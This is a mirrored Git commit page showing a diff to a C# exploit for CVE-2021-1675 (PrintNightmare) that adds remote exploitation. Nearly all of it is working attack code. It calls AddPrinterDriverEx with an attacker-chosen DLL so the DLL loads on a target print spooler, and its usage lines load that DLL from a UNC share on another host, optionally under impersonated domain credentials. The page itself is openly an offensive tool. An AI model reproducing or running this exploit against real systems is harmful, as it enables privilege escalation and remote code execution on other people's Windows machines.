r3pek/CVE-2021-1675
1
0
Fork 0
mirror of https://github.com/cube0x0/CVE-2021-1675.git synced 2025-07-06 01:41:12 +01:00
Code Releases Activity

c# remote version

Browse source 
Signed-off-by: cube0x0 <vidfelt@protonmail.com>
This commit is contained in:
cube0x0 2021-07-01 23:30:25 +02:00
parent 2f6ae233b0
commit b74cb00b1b
6 changed files with 223 additions and 19 deletions
Download patch file Download diff file Expand all files Collapse all files

92
SharpPrintNightmare/SharpPrintNightmare/Program.cs
View file

@ -2,6 +2,7 @@
using System.ComponentModel;
using System.IO;
using System.Runtime.InteropServices;
using Tools;
namespace SharpPrintNightmare
{
@ -45,30 +46,81 @@ namespace SharpPrintNightmare
static void Main(string[] args)
{
string dllpath;
string pDriverPath = "";
string path = null;
//network credentials wont be used for LPE
string domain = "NeverGonnaGiveYouUp";
string user = "NeverGonnaLetYouDown";
string password = "NeverGonnaRunAroundAndDesertYou";
if (args == null || args.Length == 0)
{
Console.WriteLine("Need an argument containing the dll path");
Console.WriteLine(".\\SharpPrintNightmare.exe C:\\addCube.dll");
Console.WriteLine("-Locally");
Console.WriteLine(" .\\SharpPrintNightmare.exe C:\\addCube.dll");
Console.WriteLine(" .\\SharpPrintNightmare.exe 'C:\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'");
Console.WriteLine("-Remote using current context");
Console.WriteLine(" .\\SharpPrintNightmare.exe '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' '\\\\192.168.1.20'");
Console.WriteLine("-Remote using runas");
Console.WriteLine(" .\\SharpPrintNightmare.exe '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' '\\\\192.168.1.20' hackit.local domain_user Pass123");
Environment.Exit(0);
}
dllpath = args[0];
Console.WriteLine("[*] Try 1...");
addPrinter(dllpath);
Console.WriteLine("[*] Try 2...");
addPrinter(dllpath);
Console.WriteLine("[*] Try 3...");
addPrinter(dllpath);
if(args.Length > 1)
{
pDriverPath = args[1];
}
else
{
DRIVER_INFO_2[] drivers = getDrivers();
foreach (DRIVER_INFO_2 driver in drivers)
{
//Console.WriteLine(driver.pDriverPath); //debug
if (driver.pDriverPath.ToLower().Contains("filerepository"))
{
pDriverPath = driver.pDriverPath;
break;
}
}
//lucky shot
if (pDriverPath == "")
{
pDriverPath = drivers[0].pDriverPath;
}
pDriverPath = Directory.GetParent(pDriverPath).FullName + "\\UNIDRV.DLL";
}
if (args.Length > 2)
{
path = args[2];
}
if (args.Length > 3)
{
domain = args[3];
user = args[4];
password = args[5];
}
//runas /netonly
using (new Impersonator.Impersonation(domain, user, password))
{
Console.WriteLine("[*] Try 1...");
addPrinter(dllpath, pDriverPath, path);
Console.WriteLine("[*] Try 2...");
addPrinter(dllpath, pDriverPath, path);
Console.WriteLine("[*] Try 3...");
addPrinter(dllpath, pDriverPath, path);
}
}
static void addPrinter(string dllpath)
static void addPrinter(string dllpath, string pDriverPath, string path = null)
{
DRIVER_INFO_2[] drivers = getDrivers();
string pDriverPath = Directory.GetParent(drivers[0].pDriverPath).FullName + "\\UNIDRV.DLL";
Console.WriteLine($"[*] pDriverPath Found {pDriverPath}");
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug
Console.WriteLine($"[*] pDriverPath {pDriverPath}");
Console.WriteLine($"[*] Executing {dllpath}");
//DRIVER_INFO_2 Level2 = drivers[0];
//DRIVER_INFO_2 Level2 = drivers[0]; // debug
DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
Level2.cVersion = 3;
Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
@ -85,7 +137,7 @@ namespace SharpPrintNightmare
Marshal.StructureToPtr(Level2, pnt, false);
//call AddPrinterDriverEx
AddPrinterDriverEx(null, 2, pnt, flags);
AddPrinterDriverEx(path, 2, pnt, flags);
Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error());
Marshal.FreeHGlobal(pnt);
@ -98,10 +150,10 @@ namespace SharpPrintNightmare
Marshal.StructureToPtr(Level2, pnt2, false);
//call AddPrinterDriverEx
AddPrinterDriverEx(null, 2, pnt2, flags);
AddPrinterDriverEx(path, 2, pnt2, flags);
int errorcode = Marshal.GetLastWin32Error();
Marshal.FreeHGlobal(pnt2);
if(errorcode == 0)
if (errorcode == 0)
{
Console.WriteLine($"[*] Stage {i}: " + errorcode);
Console.WriteLine($"[+] Exploit Completed");
@ -110,11 +162,13 @@ namespace SharpPrintNightmare
}
}
static DRIVER_INFO_2[] getDrivers()
static DRIVER_INFO_2[] getDrivers(string path = null)
{
uint cbNeeded = 0;
uint cReturned = 0;
if (EnumPrinterDrivers(null, null, 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned))
//path = "\\\\192.168.1.20";
if (EnumPrinterDrivers(path, "Windows x64", 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned))
{
//succeeds, but shouldn't, because buffer is zero (too small)!
throw new Exception("EnumPrinters should fail!");
@ -128,7 +182,7 @@ namespace SharpPrintNightmare
}
IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded);
if (EnumPrinterDrivers(null, null, 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned))
if (EnumPrinterDrivers(path, "Windows x64", 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned))
{
DRIVER_INFO_2[] printerInfo2 = new DRIVER_INFO_2[cReturned];
long offset;